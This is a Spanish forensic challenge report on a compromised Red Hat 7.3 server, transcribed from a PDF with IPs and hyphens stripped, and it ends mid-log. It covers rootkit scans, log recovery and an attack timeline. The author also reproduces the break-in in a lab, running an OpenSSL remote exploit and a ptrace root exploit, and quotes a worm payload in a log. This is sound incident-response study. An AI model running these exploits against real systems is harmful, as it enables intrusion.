Página 1 INFORME TÉCNICO SEGUNDO RETO DE ANÁLISIS FORENSE EN CASTELLANO. 1 Introducción. 2 Entorno de trabajo. 2.1 Hardware. 2.

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Página 1 INFORME TÉCNICO SEGUNDO RETO DE ANÁLISIS FORENSE EN CASTELLANO. 1 Introducción. 2 Entorno de trabajo. 2.1 Hardware. 2."

Transcripción

1 INFORME TÉCNICO SEGUNDO RETO DE ANÁLISIS FORENSE EN CASTELLANO 1 Introducción 2 Entorno de trabajo 2.1 Hardware 2.2 Herramientas 2.3 Emulación de la máquina del reto 3 Análisis de las imágenes 3.1 Analisis inicial Descarga de las imágenes Filesystem Punto de montaje 3.2 Estudio inicial de las imágenes Distribución Ficheros de logs Cron/At Servicios levantados Chequeos rutinarios Ficheros y directorios ocultos chkrootkit rkhunter 3.3 Sleuthkit 3.4 Agrupar por tipo de archivo y comprobación de firmas 3.5 Extraer timeline 3.6 Hora del sistema 3.7 Recuperación de ficheros borrados 3.8 Inconcruencias con el swap 4 Por dónde han entrado 5 Cronograma de actividades 6 Analisis de artefactos 6.1 Virus 6.2 own 6.3 crk.tar.gz Página 1

2 6.4 sc.tgz 6.5 https 6.6 pico 6.7 woot.tgz 6.8 psyz.tar.gz 6.9 psybnc.conf 6.10 psybnc.tgz 6.11 selena.tgz 6.12 Phising 7 Respuesta a las preguntas planteadas 8 Lecciones aprendidas 9 Anexos 1. INTRODUCCIÓN Este documento es el informe técnico presentado al Segundo reto de análisis forense en castellano organizado por la UNAM a través de la DGSCA y el UNAM CERT y la empresa pública Red.es a través del Grupo de Seguridad de RedIRIS, con el apoyo de empresas y organismos de seguridad informática iberoamericanos y mundiales. Toda la información referente al evento puede consultarse a través del sitio web El objetivo de este Reto Forense V2,0 es motivar el desarrollo en el área de cómputo forense en Iberoamérica, proporcionando los elementos necesarios para realizar un análisis y a la par de que los resultados sean evaluados por expertos reconocidos en el área. 2. ENTORNO DE TRABAJO 2.1 Hardware: Portátil: centrino con 512MB RAM, fedora core 3 completamente actualizada en una partición de 10 GB y disco externo usb de 60 GB, K7: k MB RAM 20GB disco, Redhat 7.3 (servidor) por defecto emulando la máquina del reto P1: Pentium I 64MB RAM 8GB disco, Redhat 7.3 (servidor) por defecto emulando la máquina del reto Un punto de acceso que hace las veces de concentrador (switch) para crear una red 2.2 Herramientas Además de varios comandos y utilidades Unix como por ejemplo, perl, awk, grep, strings,, cat, sort, uniq, he utilizado sleuthkit 1.73 y autopsy 2.03 (http://www.sleuthkit.org/) y foremost 0.69 (http://foremost.sourceforge.net/) 2.3 Emulación de la máquina del reto Para crear una máquina similar a la proporcionada para el reto en poco más de diez minutos necesitamos los discos de instalación de RedHat 7.3, un disquete con un fichero denominado ks.cfg cuyo contenido es copia del archivo / root/anaconda_ks.cfg de las imagenes y un PC. Iniciamos la instalación tecleando :linux ks=floppy, nos pide el cambio de Página 2

3 cd y poco más. Por último hay que arrancar como :linux rescue para borrar la contraseña a root de / mnt/sysimage/etc/shadow y al rebotar la máquina activar wu ftp, imap, MySql y Apache. Debido a la facilidad y rapidez del método anterior he optado por no usar utilidades de emulación al estilo de vmware o user mode linux. 3. ANALISIS DE LAS IMÁGENES 3.1 Análisis inicial de las imágenes Descarga de las imágenes Tras infructuosos intentos desde que se abrió el plazo, por fin el 02/02/2005 sobre las 16:00 consigo una sesión en el servidor de ftp remoto turing.seguridad.unam.mx y tras casi 27 horas de descarga las imágenes están en mi equipo. Lo primero que observo es que no hay firmas de las imágenes comprimidas hda?.dd.gz sino de las imágenes descomprimidas, cruzo los dedos y descomprimo las imágenes. # gunzip c hda1.dd.gz > hda1.dd # gunzip c hda2.dd.gz > hda2.dd # gunzip c hda3.dd.gz > hda3.dd # gunzip c hda5.dd.gz > hda5.dd # gunzip c hda6.dd.gz > hda6.dd Aunque no se indica que tipo de firma se ha utilizado pruebo por si fuesen md5 o sha 1 # md5sum *.dd > firmas2.txt # diff firmas.txt firmas2.txt EUREKA eran firmas md5 y lo más importante no ha habido problemas en la descarga. El fin último de este análisis forense no es capturar al atacante, por tanto no es necesario tener demasiados requerimientos desde el punto de vista legal. No obstante para mantener la cadena de custodia he realizado una copia de seguridad de las imágenes junto con sus firmas md5 en soporte dvd+r y se las he entregado a un compañero junto con un documento indicando los nombres de los ficheros de las imágenes y las firmas md5 que contiene cada dvd. Dicho documento así como los dos dvd han sido firmados y fechados por mí y por mi compañero. Sabemos que se trata de un sistema Linux porque así se nos indica en la convocatoria sistema de cómputo Linux comprometido, pero no sabemos de qué distribución se trata, ni el sistema de ficheros utilizado, ni los puntos de montaje Filesystem de las imágenes Para averiguar el sistema de ficheros he utilizado el comando file : 4 reto2]# file imagenes/hda?.dd imagenes/hda1.dd: Linux rev 1.0 ext3 filesystem data imagenes/hda2.dd: Linux rev 1.0 ext3 filesystem data imagenes/hda3.dd: Linux rev 1.0 ext3 filesystem data imagenes/hda5.dd: Linux rev 1.0 ext3 filesystem data imagenes/hda6.dd: Linux/i386 swap file (new style) 1 (4K pages) size pages Página 3

4 Ya sabemos que se trata de cuatro particiones ext3fs y una de swap Punto de montaje No existe ninguna norma (aunque sea de facto) para denominar a las particiones Linux por tanto utilizo una estrategia de ensayo/error para determinar los puntos de montaje, voy a ir montando una a una las particiones hasta averiguar donde se encuentra /etc/fstab y /etc/mtab y a partir de ahí descubrir lo que buscamos. # mkdir /reto2 Creo un directorio (reto2) del que voy colgar toda la estructura de la máquina del reto Pruebo con la primera imagen # mount o ro,loop,noexec,nodev imagenes/hda1.dd /reto2/ donde: ro: monta la imagen en read only, previniendo cualquier tipo de escritura loop: permite que la imagen sea montada como un filesystem noexec: deshabilita la posibilidad de ejecutar ningun binario nodev: para que los dispositivos de caracteres y bloques no sean tratados como dispositivos. Hemos tenido suerte y la primera imagen es la de root A partir de los ficheros /etc/mtab y /etc/fstab se obtienen los puntos de montaje siguientes: imagenes/hda1.dd: / ext3 imagenes/hda2.dd: /home ext3 imagenes/hda3.dd: /var ext3 imagenes/hda5.dd: /usr ext3 imagenes/hda6.dd: swap swap Por comodidad para facilitar los posteriores montajes creo el scripts montaje.sh donde se montan todas las particiones excepto la de swap: mount o ro,loop,noexec,nodev imagenes/hda1.dd /reto2/ mount o ro,loop,noexec,nodev imagenes/hda2.dd /reto2/home mount o ro,loop,noexec,nodev imagenes/hda3.dd /reto2/var mount o ro,loop,noexec,nodev imagenes/hda5.dd /reto2/usr #./montaje.sh Página 4

5 3.2 Estudio inicial de la máquina Distribución De los ficheros /etc/issue y /etc/redhat release dá la impresión de que se trata de una RedHat 7.3. Más adelante lo confirmamos comprobando las firmas de los ficheros Ficheros de logs Consultando /etc/syslog.conf se observa que los ficheros de logs van a /var/log y nos encontramos con la desagradable sorpresa de que no existen :. ( Aunque no hay porqué desanimarse como veremos más adelante : ) Cron Mirando el fichero /etc/crontab y siguiendo la pista de las ejecuciones diarias descubrimos dos herramientas de gestión de logs y lo mejor, parece que nos pueden proporcionar datos. /etc/cron.daily/00 logwatch /etc/cron.daily/00webalizer logwatch está configurado (/etc/log.d/logwatch.conf y /etc/log.d/scripts/logwatch.pl) para que analice los logs de / var/log del día anterior y envie un correo electronico a root con el resultado. Investiguemos en correo de root: El correo está en formato mbox, es decir, el correo no leido se queda en /var/spool/mail/root y el leido en / root/mbox, efectivamente hay bastante información. webalizer está configurado (/etc/webalizer.conf) para que analice /var/log/httpd/access_log y genere resultados en / var/www/html/usage, en concreto, hay información interesante en /var/www/html/usage/index.html y en / var/www/html/usage/usage_ html. Podemos empezar a tirar de la cuerda ; ) Servicios levantados Aparentemente el sistema arranca a nivel 3 # grep id /reto2/etc/inittab id:3:initdefault: Analizando uno a uno los scripts de arraque (/etc/rc3.d/s*) y los servicios del xinetd (grep disable / reto2/etc/xinetd.d/* grep no) se observa que la máquina finanzas no tiene configurado un firewall y me ha parecido relevante mencionar los siguientes servicios activos: Mysql, servidor web Apache, sshd, sendmail y wu ftpd e imap a través del superservidor xinetd Chequeos rutinarios Buscar ficheros y directorios ocultos # find /reto2 type d name '.*' /reto2/root/.ssh No hay ningún directorio demasiado sospechoso oculto, probemos con todo tipo de fichero # find /reto2 name '.*' Página 5

6 de todos los ficheros encontrados al menos los siguientes me han resultado raros, /reto2/var/tmp/.bash_history /reto2/var/tmp/selena/.0.pscan.443 /reto2/root/.bash_history /reto2/.bash_history # ls /reto2/var/tmp/ psybnc psybnc.tgz selena selena.tgz w00t Interesante parece un proxy de irc y herramientas de escaneo/exploit. Además en los.bash_history se observan comandos relacionados con los mismos chkrootkit #./chkrootkit r /reto2/ grep v "not infected$" grep v "not found$" grep v "nothing found$" /usr/bin/strings: Warning: '/reto2/' is not an ordinary file unable to open wtmp file /reto2/wtmp ROOTDIR is `/reto2/' Checking `aliens' /reto2/etc/ld.so.hash Searching for t0rn's v8 defaults Possible t0rn v8 \(or variation\) rootkit installed Searching for suspicious files and dirs, it may take a while /reto2/usr/lib/perl5/5.6.1/i386 linux/.packlist Searching for Showtee Warning: Possible Showtee Rootkit installed Searching for Romanian rootkit /reto2/usr/include/file.h /reto2/usr/include/proc.h Searching for Suckit rootkit Warning: /reto2/sbin/init INFECTED Searching for ShKit rootkit default files and dirs Possible ShKit rootkit installed Checking `bindshell' not tested Checking `lkm' not tested Checking `sniffer' not tested Checking `z2' not tested: not found wtmp and/or lastlog file rootkithunter Actualizamos las firmas Página 6

7 # rkhunter update #rkhunter rootdir /reto2/ checkall MD5 compared: 53 Incorrect MD5 checksums: 37 File scan Scanned files: 342 Possible infected files: 4 Possible rootkits: Flea Linux Rootkit SHV4 Suckit Rootkit SunOS Rootkit 3.3 Sleuthkit Ya podemos asegurar que la máquina ha sido comprometida y debemos analizarla más a fondo. Crear caso, Añadir host y Añadir imágenes 3.4 Agrupación por tipo de fichero y comprobación de firmas Hasta no hace mucho se podía descargar un juego completo de firmas de una distribución determinada desde pero a día de hoy tan solo permite consultar firmas individuales ( se podría hacer un programita que consultara las firmas de una tacada, pero como que no ando muy sobrado de tiempo, pues va ser que no ; )). La siguiente opción es NSRL pero está deshabilitada del comando sorter de sleuthkit así que obtengo las firmas a partir de una de las máquinas redhat 7.3 instalada con el log de instalación de finanzas e indexo el fichero obtenido: # find / path '/dev*' prune o path '/proc*' prune o exec /usr/bin/md5sum {} \; > redhat73.txt # /usr/local/sleuthkit/bin/hfind i md5sum rh73.md5 Paso a agrupar: # /usr/local/sleuthkit/bin/sorter f linux ext3 x./rh73.md5 d sorter/root imagenes/hda1.dd # /usr/local/sleuthkit/bin/sorter f linux ext3 x./rh73.md5 d sorter/var imagenes/hda3.dd # /usr/local/sleuthkit/bin/sorter f linux ext3 x./rh73.md5 d sorter/usr imagenes/hda5.dd Toda esta movida nos brinda mucha información, por ejemplo: 1. Asegurar con mucha más probabilidad que la máquina finanzas tiene una distribución RedHat 7.3 porque los direcctorios exclude agrupan todos los fichechos cuyas firmas coinciden con la base proporcionada (RedHat 7.3) 2. Hay binarios en /var! 3. Hay 66 binarios de /bin que no casan las firmas por ejemplo ls, mkdir, ping, su, cpio, dd,.. 4. Etc, etc, etc, 3.5 Extraer timeline Sin lugar a dudas una de las herramientas mas útiles en análisis forense es mactime de TCT (http://www.porcupine.org/forensics/tct.html) o Sleuthkit (http://www.sleuthkit.org) Por comodidad, he usado el frontal web de Sleuthkit, Autopsy en concreto la opcion "File activity timelines". El Página 7

8 proceso consta de dos pasos en primer lugar crear un fichero de datos (mac robber en TCT o fls e ils en Sleuthkit) y el segundo consultar entre un rango de fechas y obtener el fichero de tiempos de Modificacion, Acceso y Cambio. Una vez obtenido el fichero hay que armarse de paciencia e indagar en busca de algo sospechoso. Exactamente en autopsy se hace 1. create data file seleccionando todas las imagenes y todos los tipos de datos (ficheros asignados, no asignados y metadatos no asignados); 2. create timeline 3.6 Hora del sistema La hora del sistema está almacenada en formato local en lugar de en formato UTC, es decir, el reloj de la BIOS no es una referencia al huso horario del meridiano de Grewich (GMT) sino que es exactamente la hora del lugar donde se ubica la máquina ( siempre y cuando esté en hora ; ) ). En el caso que nos ocupa se trata de la hora de la Ciudad de México o lo que es lo mismo CST (Central Standard Time) o GMT 6 ~]# more /reto2/etc/sysconfig/clock ZONE="America/Mexico_City" UTC=false ARC=false Jan 20 16:33:27 finanzas rc.sysinit: Setting clock (localtime): Thu Jan 20 16:33:20 CST 2005 succeeded Podríamos obtener un timeline usando la zona de tiempo GMT y realizar la conversión a GMT 6 cuando haya que correlacionar con un log de la máquina. Sin embargo me ha resultado más cómodo calcular el timeline con un desfase de +6 horas con respecto a GMT y así coincide exactamente con los logs del sistema. Por otra parte no se observan evidencias que demuestren que la máquina esté sincronizada, así que todas las horas van a ser referencia a las que aparecen en el sistema. 3.7 Recuperación de ficheros borrados Han desaparecido todos los logs de /var/log ( como veremos más adelante el intento de instalación de una rootkit se ha encargado de ello). Tal como se indica en la FAQ de ext3 (http://batleth.sapienti sat.org/projects/faqs/ext3 faq.html) la recuperación en sistemas de ficheros ext3 no es trivial como en ext2 porque cuando se borra un fichero además de marcar el inodo como borrado los punteros de bloque se ponen a 0 y no puedes seguir la pista. Para restaurar lo borrado hay que buscar en el espacio no asignado, bien buscando cadenas de caracteres directamente o bien buscando patrones que identifique tipos de ficheros con herramientas al estilo de foremost o magic rescue. Tambien se puede intentar acotar la busqueda localizando el grupo en el que se encuentran partes del fichero, como es bastante probable que todo el fichero esté en el mismo grupo restringiriamos la busqueda a ese grupo. Por otra parte como los ficheros de logs generados por syslogd tienen un patron común mes dia hh:mm:ss maquina, se puede intentar recuperar cadenas de ese estilo en el espacio no asignado de /var/log, o lo que es lo mismo hda3.dd Extraemos el espacio no asignado con la utilidad dls de sleuthkit # /usr/local/sleuthkit/bin/dls f linux ext3 imagenes/hda3.dd > unallocated/hda3.dls y extraemos del espacio no asignado las cadenas de caracteres # strings unallocated/hda3.dls > unallocated/hda3.dls.str He confeccionado un programita en perl para extraer cadenas con el formato de syslog (Anexo 1). Página 8

9 #./syslog.pl sort > syslog.log sort. Para ordenar el logs en este caso ( solo hay datos de Enero) quito las referencias a Jan y ene y ordeno con # cut c 5 syslog.log sort > syslog.log.ord Eureka algo hemos encontrado # cat syslog.log.ord 20 16:33:27 finanzas date: Thu Jan 20 16:33:20 CST :33:27 finanzas fsck: /: clean, 17048/ files, 23876/ blocks 20 16:33:27 finanzas rc.sysinit: Activating swap partitions: succeeded 23 04:01:00 finanzas CROND[5074]: (root) CMD (run parts /etc/cron.hourly) 23 04:02:00 finanzas CROND[5076]: (root) CMD (run parts /etc/cron.daily) 23 04:02:01 finanzas anacron[5239]: Updated timestamp for job `cron.daily' to :11: ] [error] mod_ssl: Child could not open SSLMutex lockfile /etc/httpd/logs/ssl_mutex.723 (System error follows) Siguiendo la misma estrategia se recuperan los logs del servidor web apache, en concreto access_log, error_log y ssl_engine_log utilizando los perl access.pl, error.pl y ssl_engine.pl #./access.pl unallocated/hda3.dls.str > access_log #./error.pl unallocated/hda3.dls.str > error_log #./ssl_engine.pl unallocated/hda3.dls.str > ssl_engine_log 3.8 Incongruencias en el swap Intento aplicar la misma estrategia al area de swap, es decir, # strings imagenes/hda6.dd > imagenes/hda6.dd.str #./syslog.pl imagenes/hda6.dd.str pero sorprendentemente los datos recuperados pertenecen a la máquina iqunam y no hay nada relativo a finanzas y además las fechas no coinciden en absoluto. Se me ocurren dos posibles explicaciones a este hecho: 1) Se ha cargado en memoria un fichero tipo syslog de la máquina iqunam,? 2) finanzas es un host virtual que comparte el area de swap con otra máquina? En un analisis superficial porque no tiene relevancia para el analisis de la máquina finanzas he observado en el syslog encontrado en la partición de swap: La máquina se llama iqunam Las fechas son de Marzo del 11 al 16 Tiene instalado el producto HostsEntry/PortEntry que bloquea direcciones de red atendiendo a ciertos criterios. Ataques de diccionario al ipod3d, ftpd, sshd Conexiones de usuarios legitimos: lista, fede, jdvc, peregrino Página 9

10 peregrino > root Conexiones por ssh del usuario hector desde y Reinicios de la máquina Entradas al sistema por consola Problemas con httpd.conf La instalación de un nuevo kernel genera problemas al rearrancar Cambio del sistema de archivos a ext3 Problemas con smbd iqunam.iquimica.unam.mx? etc, etc,etc Al no poder contrastar esos datos con ninguna otra fuente no les presto mayor importancia. En definitiva un misterio sin resolver. 4. POR DÓNDE HAN ENTRADADO? Al haber encontrado en la máquina un escaner de servidores samba y otro de openssl, lo lógico es pensar que los intrusos han entrado por uno de esos caminos. Samba lo descarto porque no está activo. Nuestra hipotesis de trabajo es que los atacantes han conseguido el acceso al sistema a través de openssl, vamos a intentar demostralo. La máquina finanzas tiene la versión 0.9.6b de OpenSSL, lo comprobamos por varios caminos: # strings /reto2/usr/lib/libssl.a grep OpenSSL y # strings /reto2/usr/bin/openssl grep OpenSSL more Es la que se instala con RH7.3 por defecto porque no aparece como modificado en la salida de rpmverify y aparece en la carpeta exclude de la salida de sorter Dicha versión versión de openssl tiene una vulnerabilidad descrita en VU# del CERT ( ) y en CAN (http://cve.mitre.org/cgi bin/cvename.cgi?name=can ) Agenda de trabajo: Encontar un exploit, lanzarlo contra una máquina de prueba, observar las trazas que deja la ejecución y buscar los mismos rastros en finanzas. De me bajo el fichero openssl too open.tar.gz, lo compilo y lo lanzo contra una de las máquinas de laboratorio que tiene instalada una redhat 7.3 corriendo Apache. Consta de tres pasos: 1. Escaneo openssl too open]#./openssl scanner : openssl scanner : OpenSSL vulnerability scanner : Vulnerable access_log: ningun rastro error_log: Página 10

11 [Tue Mar 1 19:17: ] [notice] Apache/ (Unix) (Red Hat/Linux) mod_ssl/2.8.7 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.1.2 mod_perl/1.26 configured resuming normal operations [Tue Mar 1 19:17: ] [notice] suexec mechanism enabled (wrapper: /usr/sbin/suexec) [Tue Mar 1 19:17: ] [notice] Accept mutex: sysvsem (Default: sysvsem) ssl_engine_log:ningún rastro 2. Averiguar la versión de apache # nc HEAD / HTTP/1.0 HTTP/ OK Date: Tue, 01 Mar :28:20 GMT Server: Apache/ (Unix) (Red Hat/Linux) mod_ssl/2.8.7 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.1.2 mod_perl/1.26 access_log: [01/Mar/2005:19:28: ] "HEAD / HTTP/1.0" " " " " error_log: NADA ssl_engine_log:nada 3. Lanzar el exploit con la versión exacta: #./openssl too open a 0x0b : openssl too open : OpenSSL remote exploit readline: warning: rl_prep_terminal: cannot get terminal settingsbash 2.05a$ readline: warning: rl_prep_terminal: cannot get terminal settingsbash 2.05a$ Linux localhost.localdomain #1 Thu Apr 18 07:32:41 EDT 2002 i686 unknown uid=48(apache) gid=48(apache) groups=48(apache) 7:31pm up 20 min, 2 users, load average: 0.00, 0.01, 0.03USER TTY FROM IDLE JCPU PCPU WHAT root tty1 7:11pm 2: s 0.09s bash juan pts/0 portatil 7:23pm 2: s 0.04s bash readline: warning: rl_prep_terminal: cannot get terminal settingsbash 2.05a$ readline: warning: rl_prep_terminal: cannot get terminal settingsbash 2.05a$ id uid=48(apache) gid=48(apache) groups=48(apache) readline: warning: rl_prep_terminal: cannot get terminal settingsbash 2.05a$ OBJETIVO CONSEGUIDO tenemos una shell local como usuario apache, el siguiente reto es elevar los privilegios y conseguir ser root Página 11

12 acces_log : NADA error_log: [Tue Mar 1 19:31: ] [error] mod_ssl: SSL handshake failed (server localhost.localdomain:443, client ) (OpenSSL library error follows) [Tue Mar 1 19:31: ] [error] OpenSSL: error: f:lib(20):func(105):reason(143) ssl_engine_log: [01/mar/ :31: ] [error] SSL handshake failed (server localhost.localdomain:443, client ) (OpenSSL library error follows) [01/mar/ :31: ] [error] OpenSSL: error: f:lib(20):func(105):reason(143) Ya tenemos una forma de entrar al sistema y los rastros que deja en los logs de Apache contrastemoslos con los logs recuperados de finanzas: Encontramos rastros en los logs recuperados de finanzas access_log de finanzas [29/Jan/2005:14:57: ] "GET / HTTP/1.1" " " " " [29/Jan/2005:14:57: ] "GET / HTTP/1.1" " " " " [30/Jan/2005:04:10: ] "GET / HTTP/1.1" " " " " [30/Jan/2005:04:10: ] "GET / HTTP/1.1" " " " " error_log de finanzas [Sat Jan 29 14:58: ] [error] mod_ssl: SSL handshake failed (server :443, client ) (OpenSSL library error follows) [Sat Jan 29 14:58: ] [error] OpenSSL: error: f:lib(20):func(105):reason(143) [Sat Jan 29 15:00: ] [error] mod_ssl: SSL handshake failed (server :443, client ) (OpenSSL library error follows) [Sat Jan 29 15:00: ] [error] OpenSSL: error: f:lib(20):func(105):reason(143) [Sat Jan 29 15:10: ] [error] mod_ssl: SSL handshake failed (server :443, client ) (OpenSSL library error follows) [Sat Jan 29 15:10: ] [error] OpenSSL: error: f:lib(20):func(105):reason(143) [Sat Jan 29 15:14: ] [error] mod_ssl: SSL handshake failed (server :443, client ) (OpenSSL library error follows) [Sat Jan 29 15:14: ] [error] OpenSSL: error: f:lib(20):func(105):reason(143) [Sun Jan 30 04:15: ] [error] mod_ssl: SSL handshake failed (server :443, client ) (OpenSSL library error follows) [Sun Jan 30 04:15: ] [error] OpenSSL: error: f:lib(20):func(105):reason(143) [Sun Jan 30 05:36: ] [error] mod_ssl: SSL handshake failed (server :443, client ) (OpenSSL library error follows) [Sun Jan 30 05:36: ] [error] OpenSSL: error: f:lib(20):func(105):reason(143) [Sun Jan 30 05:36: ] [error] mod_ssl: SSL handshake failed (server :443, client ) (OpenSSL library error follows) [Sun Jan 30 05:36: ] [error] OpenSSL: error: f:lib(20):func(105):reason(143) Página 12

13 Se ejecuta el exploit desde en diferentes ocasiones EXPLOIT LOCAL PARA SER ROOT Me llamó la atención que el intruso borrase un fichero denominado own. Por curiosidad compruebo si sigue existiendo en los repositorios de nuestro amigo y efectivamente existe un fichero own en y en # file own.zetu own.zetu: ELF 32 bit LSB executable, Intel 80386, version 1 (SYSV), bad note name size 0x80cde189, bad note description size 0x8904b3db, bad note description size 0xc , bad note name size 0xe18902b3, bad note name size 0xb0c03150, dynamically linked (uses shared libs), not stripped # file own.xhack own.xhack: exported SGML document text # strings own.zetu /proc/self/exe [ ] Unable to read /proc/self/exe [+] Now wait for suid shell [ ] Unable to detach from victim Buscando en google por /proc/self/exe y exploit nos lleva a pensar que se trata del exploit local ptrace de los kernel 2.2 y 2.4 VU# del CERT ( ) $./own Intento probarlo en nuestra máquina de pruebas y mira por donde funciona y nos convierte en root : ) [+] Attached to 1700 [+] Signal caught [+] Shellcode placed at 0x4000fd1d [+] Now wait for suid shell sh 2.05a# id uid=0(root) gid=0(root) grupos=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) sh 2 05a# 5. CRONOGRAMA (GMT 6) 1. 20/01/ :51: :49:08 Instalación del sistema, configuración y máquina operativa. Consultando la hora de instalación de los paquetes se produjo entre las 16:51:33 y las 17:02:42 CET o lo que es lo Página 13

14 mismo entre las 09:51 y las 10:02 GMT 6 ~]# rpm qa dbpath /reto2/var/lib/rpm/ last more mysqlclient jue 20 ene :02:42 CET glibc common jue 20 ene :51:33 CET Thu Jan :53: c / rwxr xr x root root /boot/vmlinux Thu Jan :02: m.c / rw r r root root /root/install.log Thu Jan :06: m.c / rw r r root root /root/anaconda ks.cfg Se termina de configurar el equipo: red, scripts de arranque de mysql y Apache Thu Jan :28: m.c / rw r r root root /etc/sysconfig/network scripts/ifcfg eth0 Thu Jan :29: m.c / rw r r root root /etc/sysconfig/network scripts/ifcfg eth0:1 Thu Jan :29:29 57 m.c / rw r r root root /etc/sysconfig/network 4096 m.c d/drwxr xr x root root /etc/sysconfig Thu Jan :31: c l/lrwxrwxrwx root root /etc/rc.d/rc3.d/s12mysqld >../init.d/mysqld Thu Jan :31: c l/lrwxrwxrwx root root /etc/rc.d/rc3.d/s15httpd >../init.d/httpd Arranque del sistema Thu Jan :33:28 4.a. l/lrwxrwxrwx root root /dev/ftape > qft0 3.a. l/lrwxrwxrwx root root /dev/sgd > sg3 Jan 20 16:33:46 finanzas kernel: CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) Jan 20 16:33:46 finanzas kernel: CPU: L2 Cache: 256K (64 bytes/line) Jan 20 16:33:46 finanzas kernel: Intel machine check architecture supported. Jan 20 16:33:46 finanzas kernel: Intel machine check reporting enabled on CPU#0.Jan 20 16:33:46 finanzas kernel: CPU: AMD Athlon(tm) processor stepping 02 Jan 20 16:33:46 finanzas kernel: Enabling fast FPU save and restore done. Jan 20 16:33:47 finanzas kernel: Checking 'hlt' instruction OK. Reboot de la máquina Thu Jan :42: a. / rwxr xr x root root /sbin/shutdown Jan 20 16:42:32 finanzas init: Switching to runlevel: 6 Jan 20 16:42:32 finanzas login(pam_unix)[1062]: session closed for user root Jan 20 16:42:32 finanzas shutdown: shutting down for system reboot Conexion al sistema del administrador y máquina completamente operativa Jan 20 16:44:49 finanzas login(pam_unix)[1044]: session opened for user root by LOGIN(uid=0) Jan 20 16:44:49 finanzas root[1044]: ROOT LOGIN ON tty1 Jan 20 16:46:08 finanzas login(pam_unix)[1044]: session closed for user root Página 14

15 2.1 20/01/ :39:02..17:43:53 se observa un intentos de acceso por fuerza bruta al servicio ssh desde la Ip , Jan 20 17:39:02 finanzas sshd[1153]: Failed password for root from port ssh2 Jan 20 17:43:53 finanzas sshd[1233]: Received disconnect from : 11: Bye Bye /01/ :18:17 Conexión ftp anónimo? desde Thu Jan :18: m.c d/drwxr xr x root root /usr/share/ssl 1024.a. / rw root root /usr/share/ssl/.rnd Jan 20 19:18:16 finanzas ftpd[1305]: wu ftpd TLS settings: control allow, client_cert allow, data allow Jan 20 19:18:16 finanzas xinetd[934]: START: ftp pid=1305 from= Jan 20 19:18:17 finanzas xinetd[934]: EXIT: ftp pid=1305 duration=1(sec) Jan 20 19:19:16 finanzas ftpd[1306]: FTP session closed Jan 20 19:19:16 finanzas ftpd[1306]: wu ftpd TLS settings: control allow, client_cert allow, data allow Jan 20 19:19:16 finanzas xinetd[934]: EXIT: ftp pid=1306 duration=0(sec) Jan 20 19:19:16 finanzas xinetd[934]: START: ftp pid=1306 from= Tambien se observa en el mensaje enviado por logwatch el Fri Jan 21 04:02: /01/ :43:23..09:43:37. ataque ssh de fuerza bruta ahora con el usuario root, test, guest y admin desde Jan 21 09:43:23 finanzas sshd[2288]: Failed password for illegal user guest from port ssh2 Jan 21 09:43:37 finanzas sshd[2295]: Received disconnect from : 11: Bye Bye /01/ :39: :56:52: Ataque ssh de fuerza bruta desde contra los usuarios Usuarios válidos: adm,apache,mysql,nobody,operator,root Usuarios inexistentes: account, adam, alan, backup, cip51, cip52, cosmin, cyrus, data, frank, george, henry, horde, iceuser, irc, jane, joh, master, matt, noc, oracle, pamela, patrick, rolo, server, sybase, test, user, web, webmaster, www, www data, wwwrun Jan 22 05:39:12 finanzas sshd[3551]: Failed password for nobody from port ssh2 Jan 22 05:56:52 finanzas sshd[3779]: Received disconnect from : 11: Bye Bye /01/ :04:09..07:08:04: Otro ataque de fuerza bruta desde Intentando los mismos usuarios que el anterior!! Jan 22 07:04:09 finanzas sshd(pam_unix)[3834]: authentication failure; logname= uid=0 euid=0 tty=nodevssh ruser= rhost=customer reverseentry user=nobody Jan 22 07:08:04 finanzas sshd[3942]: Received disconnect from : 11: Bye Bye /01/ :13:21..09:19:28: Nuevo ataque ssh de fuerza bruta desde contra los usuarios: Existentes: mail,rpc, Página 15

16 No existentes: alex, ana, andrea, andrew, angel, bank, barbara, betty, billy, bob, brandon, brian, buddy, carmen, charlie, christopher, connect, coolboy, credit, daniel, david, derek, dog, emily, eric, fbi, fire, gai, gay, george, god, horse, host, info, james, jane, jason, jeremy, joe, johnny, jordan, just, justice, justin, larisa, laser, lion, lisa, local, lucy, magic, manager, maria, mario, mark, martin, max, michael, nicholas, nicole, nokia, patrick, robert, robin, rose, shin, smile, smith, sonya, sparc, stephen, steven, tcp, tom, tony, tv, vampire, veronica, victor, vip, william, yoyo Jan 22 09:13:21 finanzas sshd[4040]: Failed password for illegal user jordan from port ssh2 Jan 22 09:19:28 finanzas sshd[4221]: Received disconnect from : 11: Bye Bye / :07: /01/ :11:50: Escaneo buscando proxies desde se repite el patron en 14 ocasiones. Como se trata de ruido no lo mencionaré expresamente a partir de ahora. access_log [23/Jan/2005:12:07: ] "GET HTTP/1.0" " " " " error_log [Sun Jan 23 12:07: ] [error] [client ] File does not exist: /var/www/html/pk/service /01/2005:10:30: /01/2005:13:16:16: Podría tratarse de actividad propiciada por algún gusano como por ejemplo alguna de las variantes del gusano nachi que intentan explotar servidores IIS con webdav activado Las Ips imploicadas son las siguientes: Los logs en access_log y error_log [24/Jan/2005:10:30: ] "SEARCH / [Mon Jan 24 10:30: ] [error] [client ] request failed: URI too long /01/ :50:47 Intento de chequear la versión de webmail desde posiblemente buscando servidores vulnerables access_log [25/Jan/2005:07:50: ] "GET /cgi bin/openwebmail/openwebmail.pl HTTP/1.0" " " "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" error_log [Tue Jan 25 07:50: ] [error] [client ] script not found or unable to stat: /var/www/cgi bin/openwebmail /01/ :58:44 Intentos de explotar un IIS inexistente, codered, nimda, desde access_log [28/Jan/2005:10:58: ] "GET / default.ida?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090% 